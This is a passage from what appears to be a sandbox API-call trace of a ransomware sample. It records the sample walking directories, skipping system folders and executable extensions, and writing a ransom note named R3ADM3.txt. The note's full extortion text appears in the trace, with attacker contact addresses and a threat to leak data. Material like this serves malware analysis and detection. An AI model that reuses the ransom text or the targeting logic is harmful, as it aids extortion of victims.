cAlternateFileName="DVDSTY~1")) returned 1 [0155.164] lstrcmpW (lpString1="DvdStyles", lpString2=".") returned 1 [0155.164] lstrcmpW (lpString1="DvdStyles", lpString2="..") returned 1 [0155.164] StrStrIW (lpFirst="DvdStyles", lpSrch="tmp") returned 0x0 [0155.164] StrStrIW (lpFirst="DvdStyles", lpSrch="winnt") returned 0x0 [0155.164] StrStrIW (lpFirst="DvdStyles", lpSrch="temp") returned 0x0 [0155.164] StrStrIW (lpFirst="DvdStyles", lpSrch="thumb") returned 0x0 [0155.164] StrStrIW (lpFirst="DvdStyles", lpSrch="$Recycle.Bin") returned 0x0 [0155.164] StrStrIW (lpFirst="DvdStyles", lpSrch="$RECYCLE.BIN") returned 0x0 [0155.164] StrStrIW (lpFirst="DvdStyles", lpSrch="System Volume Information") returned 0x0 [0155.164] StrStrIW (lpFirst="DvdStyles", lpSrch="Boot") returned 0x0 [0155.164] StrStrIW (lpFirst="DvdStyles", lpSrch="Windows") returned 0x0 [0155.165] StrStrIW (lpFirst="DvdStyles", lpSrch="Trend Micro") returned 0x0 [0155.165] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecbf8 [0155.165] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2fd0 [0155.165] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c08 [0155.165] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb05d0 [0155.165] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c08 | out: hHeap=0xea0000) returned 1 [0155.165] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2fd0 | out: hHeap=0xea0000) returned 1 [0155.165] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecbf8 | out: hHeap=0xea0000) returned 1 [0155.165] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecbf8 [0155.165] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec7d0 [0155.165] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb05d0 | out: hHeap=0xea0000) returned 1 [0155.165] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9060745b, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x9060745b, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x4877fc17, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x379f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Filters.xml", cAlternateFileName="")) returned 1 [0155.165] lstrcmpW (lpString1="Filters.xml", lpString2=".") returned 1 [0155.165] lstrcmpW (lpString1="Filters.xml", lpString2="..") returned 1 [0155.165] StrStrIW (lpFirst="Filters.xml", lpSrch=".UAKXC") returned 0x0 [0155.165] StrStrIW (lpFirst="Filters.xml", lpSrch=".exe") returned 0x0 [0155.165] StrStrIW (lpFirst="Filters.xml", lpSrch=".dll") returned 0x0 [0155.165] StrStrIW (lpFirst="Filters.xml", lpSrch=".lnk") returned 0x0 [0155.165] StrStrIW (lpFirst="Filters.xml", lpSrch=".sys") returned 0x0 [0155.165] StrStrIW (lpFirst="Filters.xml", lpSrch=".msi") returned 0x0 [0155.165] StrStrIW (lpFirst="Filters.xml", lpSrch="R3ADM3.txt") returned 0x0 [0155.165] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecbd0 [0155.165] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2fd0 [0155.165] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c08 [0155.165] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb05d0 [0155.165] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c08 | out: hHeap=0xea0000) returned 1 [0155.165] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2fd0 | out: hHeap=0xea0000) returned 1 [0155.166] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecbd0 | out: hHeap=0xea0000) returned 1 [0155.166] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec4f8 [0155.166] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecbd0 [0155.166] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec700 [0155.166] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xea0000) returned 1 [0155.166] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb05d0 | out: hHeap=0xea0000) returned 1 [0155.166] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93e437ad, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93e437ad, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x689cd275, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8edf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Parity.fx", cAlternateFileName="")) returned 1 [0155.166] lstrcmpW (lpString1="Parity.fx", lpString2=".") returned 1 [0155.166] lstrcmpW (lpString1="Parity.fx", lpString2="..") returned 1 [0155.166] StrStrIW (lpFirst="Parity.fx", lpSrch=".UAKXC") returned 0x0 [0155.166] StrStrIW (lpFirst="Parity.fx", lpSrch=".exe") returned 0x0 [0155.166] StrStrIW (lpFirst="Parity.fx", lpSrch=".dll") returned 0x0 [0155.166] StrStrIW (lpFirst="Parity.fx", lpSrch=".lnk") returned 0x0 [0155.166] StrStrIW (lpFirst="Parity.fx", lpSrch=".sys") returned 0x0 [0155.166] StrStrIW (lpFirst="Parity.fx", lpSrch=".msi") returned 0x0 [0155.166] StrStrIW (lpFirst="Parity.fx", lpSrch="R3ADM3.txt") returned 0x0 [0155.166] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21128 [0155.166] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2fd0 [0155.166] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c08 [0155.166] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb05d0 [0155.166] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c08 | out: hHeap=0xea0000) returned 1 [0155.166] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2fd0 | out: hHeap=0xea0000) returned 1 [0155.166] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf21128 | out: hHeap=0xea0000) returned 1 [0155.166] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec4f8 [0155.166] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21128 [0155.166] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec838 [0155.167] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xea0000) returned 1 [0155.167] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb05d0 | out: hHeap=0xea0000) returned 1 [0155.167] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61718c10, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x61718c10, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x61718c10, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0155.167] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0155.167] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0155.167] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0155.167] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0155.167] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0155.167] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0155.167] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0155.167] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0155.167] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0155.167] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61718c10, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x61718c10, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x61718c10, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0155.167] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3080 | out: hHeap=0xea0000) returned 1 [0155.167] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecdb0 | out: hHeap=0xea0000) returned 1 [0155.167] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0155.167] Sleep (dwMilliseconds=0x32) [0155.766] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2bb0 | out: hHeap=0xea0000) returned 1 [0155.766] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3658 | out: hHeap=0xea0000) returned 1 [0155.766] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec4f8 [0155.766] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0155.766] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec908 [0155.767] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0155.767] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0155.767] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecdb0 [0155.767] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0155.767] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec9d8 [0155.767] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0155.767] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec9d8 | out: hHeap=0xea0000) returned 1 [0155.767] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0155.767] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecdb0 | out: hHeap=0xea0000) returned 1 [0155.767] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\R3ADM3.txt" (normalized: "c:\\program files\\internet explorer\\en-us\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0155.935] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0155.935] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0155.936] CloseHandle (hObject=0x6dc) returned 1 [0155.936] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0155.936] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0155.936] FindFirstFileW (in: lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x61e62f70, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x61e62f70, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0155.937] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0155.937] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x61e62f70, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x61e62f70, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.937] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0155.937] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0155.937] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hmmapi.dll.mui", cAlternateFileName="")) returned 1 [0155.937] lstrcmpW (lpString1="hmmapi.dll.mui", lpString2=".") returned 1 [0155.937] lstrcmpW (lpString1="hmmapi.dll.mui", lpString2="..") returned 1 [0155.937] StrStrIW (lpFirst="hmmapi.dll.mui", lpSrch=".UAKXC") returned 0x0 [0155.937] StrStrIW (lpFirst="hmmapi.dll.mui", lpSrch=".exe") returned 0x0 [0155.937] StrStrIW (lpFirst="hmmapi.dll.mui", lpSrch=".dll") returned=".dll.mui" [0155.937] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iedvtool.dll.mui", cAlternateFileName="")) returned 1 [0155.937] lstrcmpW (lpString1="iedvtool.dll.mui", lpString2=".") returned 1 [0155.937] lstrcmpW (lpString1="iedvtool.dll.mui", lpString2="..") returned 1 [0155.937] StrStrIW (lpFirst="iedvtool.dll.mui", lpSrch=".UAKXC") returned 0x0 [0155.937] StrStrIW (lpFirst="iedvtool.dll.mui", lpSrch=".exe") returned 0x0 [0155.937] StrStrIW (lpFirst="iedvtool.dll.mui", lpSrch=".dll") returned=".dll.mui" [0155.937] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ieinstal.exe.mui", cAlternateFileName="")) returned 1 [0155.937] lstrcmpW (lpString1="ieinstal.exe.mui", lpString2=".") returned 1 [0155.937] lstrcmpW (lpString1="ieinstal.exe.mui", lpString2="..") returned 1 [0155.937] StrStrIW (lpFirst="ieinstal.exe.mui", lpSrch=".UAKXC") returned 0x0 [0155.937] StrStrIW (lpFirst="ieinstal.exe.mui", lpSrch=".exe") returned=".exe.mui" [0155.937] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ielowutil.exe.mui", cAlternateFileName="")) returned 1 [0155.938] lstrcmpW (lpString1="ielowutil.exe.mui", lpString2=".") returned 1 [0155.938] lstrcmpW (lpString1="ielowutil.exe.mui", lpString2="..") returned 1 [0155.938] StrStrIW (lpFirst="ielowutil.exe.mui", lpSrch=".UAKXC") returned 0x0 [0155.938] StrStrIW (lpFirst="ielowutil.exe.mui", lpSrch=".exe") returned=".exe.mui" [0155.938] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe647cb96, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe647cb96, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0xe45e4000, ftLastWriteTime.dwHighDateTime=0x1ca042a, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iexplore.exe.mui", cAlternateFileName="")) returned 1 [0155.938] lstrcmpW (lpString1="iexplore.exe.mui", lpString2=".") returned 1 [0155.938] lstrcmpW (lpString1="iexplore.exe.mui", lpString2="..") returned 1 [0155.938] StrStrIW (lpFirst="iexplore.exe.mui", lpSrch=".UAKXC") returned 0x0 [0155.938] StrStrIW (lpFirst="iexplore.exe.mui", lpSrch=".exe") returned=".exe.mui" [0155.938] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jsdbgui.dll.mui", cAlternateFileName="")) returned 1 [0155.938] lstrcmpW (lpString1="jsdbgui.dll.mui", lpString2=".") returned 1 [0155.938] lstrcmpW (lpString1="jsdbgui.dll.mui", lpString2="..") returned 1 [0155.938] StrStrIW (lpFirst="jsdbgui.dll.mui", lpSrch=".UAKXC") returned 0x0 [0155.938] StrStrIW (lpFirst="jsdbgui.dll.mui", lpSrch=".exe") returned 0x0 [0155.938] StrStrIW (lpFirst="jsdbgui.dll.mui", lpSrch=".dll") returned=".dll.mui" [0155.938] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jsdebuggeride.dll.mui", cAlternateFileName="")) returned 1 [0155.938] lstrcmpW (lpString1="jsdebuggeride.dll.mui", lpString2=".") returned 1 [0155.938] lstrcmpW (lpString1="jsdebuggeride.dll.mui", lpString2="..") returned 1 [0155.938] StrStrIW (lpFirst="jsdebuggeride.dll.mui", lpSrch=".UAKXC") returned 0x0 [0155.938] StrStrIW (lpFirst="jsdebuggeride.dll.mui", lpSrch=".exe") returned 0x0 [0155.938] StrStrIW (lpFirst="jsdebuggeride.dll.mui", lpSrch=".dll") returned=".dll.mui" [0155.938] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JSProfilerCore.dll.mui", cAlternateFileName="")) returned 1 [0155.939] lstrcmpW (lpString1="JSProfilerCore.dll.mui", lpString2=".") returned 1 [0155.939] lstrcmpW (lpString1="JSProfilerCore.dll.mui", lpString2="..") returned 1 [0155.939] StrStrIW (lpFirst="JSProfilerCore.dll.mui", lpSrch=".UAKXC") returned 0x0 [0155.939] StrStrIW (lpFirst="JSProfilerCore.dll.mui", lpSrch=".exe") returned 0x0 [0155.939] StrStrIW (lpFirst="JSProfilerCore.dll.mui", lpSrch=".dll") returned=".dll.mui" [0155.939] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jsprofilerui.dll.mui", cAlternateFileName="")) returned 1 [0155.939] lstrcmpW (lpString1="jsprofilerui.dll.mui", lpString2=".") returned 1 [0155.939] lstrcmpW (lpString1="jsprofilerui.dll.mui", lpString2="..") returned 1 [0155.939] StrStrIW (lpFirst="jsprofilerui.dll.mui", lpSrch=".UAKXC") returned 0x0 [0155.939] StrStrIW (lpFirst="jsprofilerui.dll.mui", lpSrch=".exe") returned 0x0 [0155.939] StrStrIW (lpFirst="jsprofilerui.dll.mui", lpSrch=".dll") returned=".dll.mui" [0155.939] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61e62f70, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x61e62f70, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x61e62f70, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0155.939] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0155.939] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0155.939] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0155.939] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0155.939] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0155.939] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0155.939] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0155.939] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0155.939] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0155.939] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61e62f70, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x61e62f70, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x61e62f70, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0155.939] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0155.939] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd38 | out: hHeap=0xea0000) returned 1 [0155.939] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0155.940] Sleep (dwMilliseconds=0x32) [0156.065] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec908 | out: hHeap=0xea0000) returned 1 [0156.065] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xea0000) returned 1 [0156.065] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec4f8 [0156.065] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec908 [0156.065] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebba0 [0156.065] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec908 | out: hHeap=0xea0000) returned 1 [0156.065] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec908 [0156.065] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd38 [0156.065] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0156.065] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0156.065] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0156.065] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0156.065] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0156.065] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd38 | out: hHeap=0xea0000) returned 1 [0156.065] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\R3ADM3.txt" (normalized: "c:\\program files\\internet explorer\\signup\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0156.253] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0156.253] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, 